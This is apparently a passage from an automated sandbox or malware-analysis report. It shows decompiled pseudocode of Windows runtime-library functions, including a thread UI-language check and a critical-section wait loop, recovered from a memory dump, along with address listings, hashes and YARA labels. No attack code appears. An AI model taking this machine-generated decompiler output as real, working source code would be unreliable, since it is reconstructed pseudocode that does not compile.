																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00BFFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00BFFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00BFFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00BFFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00BFFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xcb7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xcb7b84 = _t75;
						_t73 = E00BDEB70(_t134, 0xcb7b60);
						if( *0xcb7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00BDFF60( *0xcb7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                        0x00bffab0
                                                                                        0x00bffab2
                                                                                        0x00bffab3
                                                                                        0x00bffab4
                                                                                        0x00bffabc
                                                                                        0x00bffac0
                                                                                        0x00bffb14
                                                                                        0x00bffb17
                                                                                        0x00bffac2
                                                                                        0x00bffac8
                                                                                        0x00bffacd
                                                                                        0x00bffad3
                                                                                        0x00bffad3
                                                                                        0x00bffadd
                                                                                        0x00bffb18
                                                                                        0x00bffb1b
                                                                                        0x00bffb1d
                                                                                        0x00bffb1e
                                                                                        0x00bffb1f
                                                                                        0x00bffb20
                                                                                        0x00bffb21
                                                                                        0x00bffb22
                                                                                        0x00bffb23
                                                                                        0x00bffb24
                                                                                        0x00bffb25
                                                                                        0x00bffb26
                                                                                        0x00bffb27
                                                                                        0x00bffb28
                                                                                        0x00bffb29
                                                                                        0x00bffb2a
                                                                                        0x00bffb2b
                                                                                        0x00bffb2c
                                                                                        0x00bffb2d
                                                                                        0x00bffb2e
                                                                                        0x00bffb2f
                                                                                        0x00bffb3a
                                                                                        0x00bffb3b
                                                                                        0x00bffb3e
                                                                                        0x00bffb41
                                                                                        0x00bffb44
                                                                                        0x00bffb47
                                                                                        0x00bffb4a
                                                                                        0x00bffb4d
                                                                                        0x00bffb53
                                                                                        0x00c3bdcb
                                                                                        0x00c3bdcb
                                                                                        0x00bffb59
                                                                                        0x00bffb5b
                                                                                        0x00bffb5b
                                                                                        0x00bffb5e
                                                                                        0x00c3bdd5
                                                                                        0x00c3bdd8
                                                                                        0x00000000
                                                                                        0x00c3bdda
                                                                                        0x00000000
                                                                                        0x00c3bdda
                                                                                        0x00bffb64
                                                                                        0x00bffb64
                                                                                        0x00bffb64
                                                                                        0x00bffb67
                                                                                        0x00bffb6e
                                                                                        0x00bffb70
                                                                                        0x00bffb72
                                                                                        0x00000000
                                                                                        0x00bffb78
                                                                                        0x00bffb7a
                                                                                        0x00bffb7a
                                                                                        0x00bffb7d
                                                                                        0x00bffb80
                                                                                        0x00c3bddf
                                                                                        0x00c3bde1
                                                                                        0x00000000
                                                                                        0x00c3bde3
                                                                                        0x00000000
                                                                                        0x00c3bde3
                                                                                        0x00bffb86
                                                                                        0x00bffb86
                                                                                        0x00bffb86
                                                                                        0x00bffb8b
                                                                                        0x00bffb90
                                                                                        0x00bffb92
                                                                                        0x00bffb94
                                                                                        0x00bffb9a
                                                                                        0x00bffb9b
                                                                                        0x00bffba1
                                                                                        0x00c3bde8
                                                                                        0x00c3bdeb
                                                                                        0x00c3bded
                                                                                        0x00c3beb5
                                                                                        0x00c3beb5
                                                                                        0x00c3bebb
                                                                                        0x00c3bebd
                                                                                        0x00c3bec3
                                                                                        0x00c3bed2
                                                                                        0x00c3bedd
                                                                                        0x00c3bedd
                                                                                        0x00c3beed
                                                                                        0x00000000
                                                                                        0x00c3bdf3
                                                                                        0x00c3bdfe
                                                                                        0x00c3be06
                                                                                        0x00c3be0b
                                                                                        0x00c3be0d
                                                                                        0x00c3be0f
                                                                                        0x00c3be14
                                                                                        0x00c3be19
                                                                                        0x00c3be20
                                                                                        0x00c3be25
                                                                                        0x00c3be27
                                                                                        0x00c3be35
                                                                                        0x00c3be39
                                                                                        0x00c3be46
                                                                                        0x00c3be4f
                                                                                        0x00c3be54
                                                                                        0x00c3be56
                                                                                        0x00c3bef8
                                                                                        0x00c3bef8
                                                                                        0x00000000
                                                                                        0x00c3be5c
                                                                                        0x00c3be5c
                                                                                        0x00c3be60
                                                                                        0x00000000
                                                                                        0x00c3be66
                                                                                        0x00c3be66
                                                                                        0x00c3be7f
                                                                                        0x00c3be84
                                                                                        0x00c3be87
                                                                                        0x00c3be89
                                                                                        0x00c3be8b
                                                                                        0x00c3be99
                                                                                        0x00c3be9d
                                                                                        0x00c3bea0
                                                                                        0x00c3beac
                                                                                        0x00c3beaf
                                                                                        0x00c3beb1
                                                                                        0x00c3beb3
                                                                                        0x00c3beb3
                                                                                        0x00000000
                                                                                        0x00c3bea2
                                                                                        0x00c3bea2
                                                                                        0x00000000
                                                                                        0x00c3bea2
                                                                                        0x00c3be8d
                                                                                        0x00c3be8d
                                                                                        0x00c3be92
                                                                                        0x00000000
                                                                                        0x00c3be92
                                                                                        0x00c3be8b
                                                                                        0x00c3be60
                                                                                        0x00c3be3b
                                                                                        0x00c3be3b
                                                                                        0x00c3be3e
                                                                                        0x00000000
                                                                                        0x00c3be40
                                                                                        0x00c3be40
                                                                                        0x00c3be44
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c3be44
                                                                                        0x00c3be3e
                                                                                        0x00c3be29
                                                                                        0x00c3be29
                                                                                        0x00000000
                                                                                        0x00c3be29
                                                                                        0x00c3be27
                                                                                        0x00000000
                                                                                        0x00bffba7
                                                                                        0x00bffba7
                                                                                        0x00bffbab
                                                                                        0x00c3bf02
                                                                                        0x00bffbb1
                                                                                        0x00bffbb1
                                                                                        0x00bffbb8
                                                                                        0x00bffbbd
                                                                                        0x00bffbbd
                                                                                        0x00bffbbf
                                                                                        0x00bffbbf
                                                                                        0x00bffbc5
                                                                                        0x00bffbcb
                                                                                        0x00bffbf8
                                                                                        0x00bffbf8
                                                                                        0x00bffbfa
                                                                                        0x00000000
                                                                                        0x00bffc00
                                                                                        0x00bffc00
                                                                                        0x00bffc03
                                                                                        0x00000000
                                                                                        0x00bffc09
                                                                                        0x00bffc09
                                                                                        0x00bffc0f
                                                                                        0x00bffc15
                                                                                        0x00bffc23
                                                                                        0x00bffc23
                                                                                        0x00bffc25
                                                                                        0x00bffc27
                                                                                        0x00bffc75
                                                                                        0x00bffc7c
                                                                                        0x00bffc84
                                                                                        0x00000000
                                                                                        0x00bffc29
                                                                                        0x00bffc29
                                                                                        0x00bffc2d
                                                                                        0x00bffc30
                                                                                        0x00c3bf0f
                                                                                        0x00000000
                                                                                        0x00bffc36
                                                                                        0x00bffc38
                                                                                        0x00bffc3b
                                                                                        0x00bffc41
                                                                                        0x00c3bf17
                                                                                        0x00c3bf19
                                                                                        0x00c3bf48
                                                                                        0x00c3bf4b
                                                                                        0x00000000
                                                                                        0x00c3bf1b
                                                                                        0x00c3bf22
                                                                                        0x00c3bf24
                                                                                        0x00c3bf26
                                                                                        0x00000000
                                                                                        0x00c3bf2c
                                                                                        0x00c3bf37
                                                                                        0x00c3bf39
                                                                                        0x00c3bf3b
                                                                                        0x00000000
                                                                                        0x00c3bf41
                                                                                        0x00c3bf41
                                                                                        0x00c3bf41
                                                                                        0x00c3bf41
                                                                                        0x00c3bf45
                                                                                        0x00000000
                                                                                        0x00c3bf45
                                                                                        0x00c3bf3b
                                                                                        0x00c3bf26
                                                                                        0x00000000
                                                                                        0x00bffc47
                                                                                        0x00bffc47
                                                                                        0x00bffc49
                                                                                        0x00bffcb2
                                                                                        0x00bffcb4
                                                                                        0x00bffcb6
                                                                                        0x00bffcdc
                                                                                        0x00bffcdc
                                                                                        0x00000000
                                                                                        0x00bffcb8
                                                                                        0x00bffcc3
                                                                                        0x00bffcc5
                                                                                        0x00bffcc7
                                                                                        0x00000000
                                                                                        0x00bffcc9
                                                                                        0x00bffcc9
                                                                                        0x00bffccd
                                                                                        0x00000000
                                                                                        0x00bffccd
                                                                                        0x00bffcc7
                                                                                        0x00000000
                                                                                        0x00bffc4b
                                                                                        0x00bffc4b
                                                                                        0x00bffc4e
                                                                                        0x00bffc4e
                                                                                        0x00bffc51
                                                                                        0x00bffc51
                                                                                        0x00bffc54
                                                                                        0x00bffc5a
                                                                                        0x00bffc5c
                                                                                        0x00bffc5f
                                                                                        0x00bffc61
                                                                                        0x00bffc63
                                                                                        0x00bffc65
                                                                                        0x00bffc67
                                                                                        0x00bffc6e
                                                                                        0x00bffc72
                                                                                        0x00bffc72
                                                                                        0x00bffc72
                                                                                        0x00bffc72
                                                                                        0x00bffc67
                                                                                        0x00bffc61
                                                                                        0x00000000
                                                                                        0x00bffc5a
                                                                                        0x00bffc49
                                                                                        0x00bffc41
                                                                                        0x00bffc30
                                                                                        0x00bffc27
                                                                                        0x00bffc03
                                                                                        0x00bffbcd
                                                                                        0x00bffbd3
                                                                                        0x00bffbd9
                                                                                        0x00bffbdc
                                                                                        0x00bffbde
                                                                                        0x00bffc99
                                                                                        0x00bffc9b
                                                                                        0x00bffc9d
                                                                                        0x00bffcd5
                                                                                        0x00bffcd5
                                                                                        0x00bffc89
                                                                                        0x00bffc89
                                                                                        0x00000000
                                                                                        0x00bffc9f
                                                                                        0x00bffc9f
                                                                                        0x00bffca3
                                                                                        0x00000000
                                                                                        0x00bffca3
                                                                                        0x00000000
                                                                                        0x00bffbe4
                                                                                        0x00bffbe4
                                                                                        0x00bffbe4
                                                                                        0x00bffbe4
                                                                                        0x00bffbe9
                                                                                        0x00bffbf2
                                                                                        0x00000000
                                                                                        0x00bffbf2
                                                                                        0x00bffbde
                                                                                        0x00bffbcb
                                                                                        0x00bffbab
                                                                                        0x00bffc8b
                                                                                        0x00bffc8b
                                                                                        0x00bffc8c
                                                                                        0x00bffb80
                                                                                        0x00bffb72
                                                                                        0x00bffb5e
                                                                                        0x00bffc8d
                                                                                        0x00bffc91
                                                                                        0x00bffadf
                                                                                        0x00bffadf
                                                                                        0x00bffae1
                                                                                        0x00bffae4
                                                                                        0x00bffae7
                                                                                        0x00bffaec
                                                                                        0x00bffaf8
                                                                                        0x00bffb00
                                                                                        0x00bffb07
                                                                                        0x00bffb0f
                                                                                        0x00bffb0f
                                                                                        0x00bffb07
                                                                                        0x00000000
                                                                                        0x00bffaf8
                                                                                        0x00bffadd

                                                                                        Strings
                                                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00C3BE0F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                        • API String ID: 0-865735534
                                                                                        • Opcode ID: caa91cf43a20bde3e8201f16fa02ece019f2533366b09154edab499414a258f0
                                                                                        • Instruction ID: bdfb40c2f80c768f22dce0d70c786978eeda8dbc0b14562524f474cf2b894940
                                                                                        • Opcode Fuzzy Hash: caa91cf43a20bde3e8201f16fa02ece019f2533366b09154edab499414a258f0
                                                                                        • Instruction Fuzzy Hash: DBA11631B0061A9BDB24DF68C490BBAB3E4EF44710F1445BAEA16CB791EB30DD49CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BC2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 63%
                                                                                        			E00BC2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xcb5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xcb7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E00C097C0();
				}
				if( *0xcb79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xcb79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00BF1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00BE7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00C5FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00C09520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00BFE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L00C1DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xcb6901;
								_push(_t109);
								_v52 = _t98;
								if( *0xcb6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00C09980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00C095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00BE7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00BE7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00C47016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00C5FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xcb5350;
							if(_t109 != 0xcb5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E00C5FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E00C55720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                        0x00bc2d8a
                                                                                        0x00bc2d8a
                                                                                        0x00bc2d92
                                                                                        0x00bc2d96
                                                                                        0x00bc2d9e
                                                                                        0x00bc2da0
                                                                                        0x00bc2da3
                                                                                        0x00bc2da5
                                                                                        0x00bc2da8
                                                                                        0x00bc2dab
                                                                                        0x00bc2db2
                                                                                        0x00c1f9aa
                                                                                        0x00c1f9ab
                                                                                        0x00c1f9ae
                                                                                        0x00c1f9ae
                                                                                        0x00bc2db8
                                                                                        0x00bc2dc2
                                                                                        0x00c1f9b9
                                                                                        0x00c1f9be
                                                                                        0x00c1f9bf
                                                                                        0x00c1f9bf
                                                                                        0x00bc2dcf
                                                                                        0x00c1f9c9
                                                                                        0x00bc2dd5
                                                                                        0x00bc2dd5
                                                                                        0x00bc2dd5
                                                                                        0x00bc2dde
                                                                                        0x00bc2de1
                                                                                        0x00bc2e70
                                                                                        0x00bc2e72
                                                                                        0x00bc2e72
                                                                                        0x00bc2de7
                                                                                        0x00bc2deb
                                                                                        0x00bc2e7c
                                                                                        0x00bc2e83
                                                                                        0x00bc2e85
                                                                                        0x00bc2e8b
                                                                                        0x00bc2e8d
                                                                                        0x00bc2e92
                                                                                        0x00bc2e92
                                                                                        0x00bc2e85
                                                                                        0x00bc2df1
                                                                                        0x00bc2df7
                                                                                        0x00bc2df9
                                                                                        0x00bc2df9
                                                                                        0x00bc2dfc
                                                                                        0x00bc2dff
                                                                                        0x00bc2e02
                                                                                        0x00000000
                                                                                        0x00bc2e05
                                                                                        0x00bc2e0c
                                                                                        0x00c1f9d9
                                                                                        0x00bc2e12
                                                                                        0x00bc2e12
                                                                                        0x00bc2e12
                                                                                        0x00bc2e1a
                                                                                        0x00c1f9e3
                                                                                        0x00c1f9e9
                                                                                        0x00c1f9f0
                                                                                        0x00c1f9f6
                                                                                        0x00c1f9f8
                                                                                        0x00c1f9f8
                                                                                        0x00c1f9f0
                                                                                        0x00bc2e23
                                                                                        0x00c1fa02
                                                                                        0x00c1fa03
                                                                                        0x00c1fa05
                                                                                        0x00c1fa06
                                                                                        0x00000000
                                                                                        0x00bc2e29
                                                                                        0x00bc2e29
                                                                                        0x00bc2e2e
                                                                                        0x00bc2e34
                                                                                        0x00bc2e3e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bc2e44
                                                                                        0x00bc2e47
                                                                                        0x00bc2e4d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bc2e4f
                                                                                        0x00bc2e54
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bc2e5a
                                                                                        0x00bc2e5f
                                                                                        0x00bc2e9a
                                                                                        0x00bc2ea4
                                                                                        0x00bc2ea5
                                                                                        0x00bc2ea8
                                                                                        0x00bc2eaf
                                                                                        0x00bc2eb2
                                                                                        0x00bc2eb5
                                                                                        0x00c1fae9
                                                                                        0x00c1faeb
                                                                                        0x00c1faed
                                                                                        0x00c1faef
                                                                                        0x00c1faf7
                                                                                        0x00c1faf8
                                                                                        0x00c1fafd
                                                                                        0x00c1faff
                                                                                        0x00c1fb04
                                                                                        0x00c1fb04
                                                                                        0x00c1faff
                                                                                        0x00bc2ec0
                                                                                        0x00bc2ec4
                                                                                        0x00bc2ec6
                                                                                        0x00bc2ec8
                                                                                        0x00c1fb14
                                                                                        0x00c1fb18
                                                                                        0x00c1fb1e
                                                                                        0x00c1fb21
                                                                                        0x00c1fb21
                                                                                        0x00bc2ece
                                                                                        0x00bc2ece
                                                                                        0x00bc2ece
                                                                                        0x00bc2ed7
                                                                                        0x00bc2e61
                                                                                        0x00bc2e63
                                                                                        0x00c1fa6b
                                                                                        0x00c1fa71
                                                                                        0x00c1fa76
                                                                                        0x00c1fa78
                                                                                        0x00c1fa8a
                                                                                        0x00c1fa7a
                                                                                        0x00c1fa83
                                                                                        0x00c1fa83
                                                                                        0x00c1fa8f
                                                                                        0x00c1fa91
                                                                                        0x00c1fa97
                                                                                        0x00c1fa9d
                                                                                        0x00c1faa4
                                                                                        0x00c1faaa
                                                                                        0x00c1faaf
                                                                                        0x00c1fab1
                                                                                        0x00c1fac3
                                                                                        0x00c1fab3
                                                                                        0x00c1fabc
                                                                                        0x00c1fabc
                                                                                        0x00c1fac8
                                                                                        0x00c1facb
                                                                                        0x00c1fadf
                                                                                        0x00c1fadf
                                                                                        0x00c1facb
                                                                                        0x00c1faa4
                                                                                        0x00c1fa91
                                                                                        0x00bc2e6f
                                                                                        0x00bc2e6f
                                                                                        0x00bc2e5f
                                                                                        0x00c1fa13
                                                                                        0x00c1fa15
                                                                                        0x00c1fa17
                                                                                        0x00c1fa1f
                                                                                        0x00c1fa21
                                                                                        0x00c1fa22
                                                                                        0x00c1fa25
                                                                                        0x00c1fa28
                                                                                        0x00c1fa2f
                                                                                        0x00c1fa2f
                                                                                        0x00c1fa2a
                                                                                        0x00c1fa2a
                                                                                        0x00c1fa2a
                                                                                        0x00c1fa31
                                                                                        0x00c1fa34
                                                                                        0x00c1fa36
                                                                                        0x00c1fa3c
                                                                                        0x00c1fa3e
                                                                                        0x00c1fa41
                                                                                        0x00c1fa43
                                                                                        0x00c1fa45
                                                                                        0x00c1fa45
                                                                                        0x00c1fa41
                                                                                        0x00c1fa3c
                                                                                        0x00c1fa4a
                                                                                        0x00c1fa4f
                                                                                        0x00c1fa51
                                                                                        0x00c1fa53
                                                                                        0x00c1fa56
                                                                                        0x00c1fa5b
                                                                                        0x00c1fa5e
                                                                                        0x00000000
                                                                                        0x00c1fa5e
                                                                                        0x00bc2e23

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Re-Waiting
                                                                                        • API String ID: 0-316354757
                                                                                        • Opcode ID: a69e3a30c9a10a11c8279dd081ca0e32813a2c5f5fed543f4a344b70f719d20a
                                                                                        • Instruction ID: 5d70aa1316b30b6c227a8e48b9ca63497076dfd882bde9c29b9fb5c6cc7c4099
                                                                                        • Opcode Fuzzy Hash: a69e3a30c9a10a11c8279dd081ca0e32813a2c5f5fed543f4a344b70f719d20a
                                                                                        • Instruction Fuzzy Hash: 95613770A006459FDB21DF68C880BBE77E4EF45710F2406BDE825A72D1CB349E82E791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BC52A5, Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 78%
                                                                                        			E00BC52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E00BDEEF0(0xcb79a0);
					_t104 =  *0xcb8210; // 0x762c30
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E00BDEB70(_t93, 0xcb79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E00C09890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E00BDEEF0(0xcb79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E00BDEB70(0, 0xcb79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x762c3d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E00BFF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E00BDEEF0(0xcb79a0);
									__eflags =  *0xcb8210 - _t104; // 0x762c30
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0xcb8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E00C44888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E00BDEB70(_t95, 0xcb79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00C095D0();
											L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00C095D0();
											L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E00BDEB70(_t93, 0xcb79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E00C095D0();
										L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
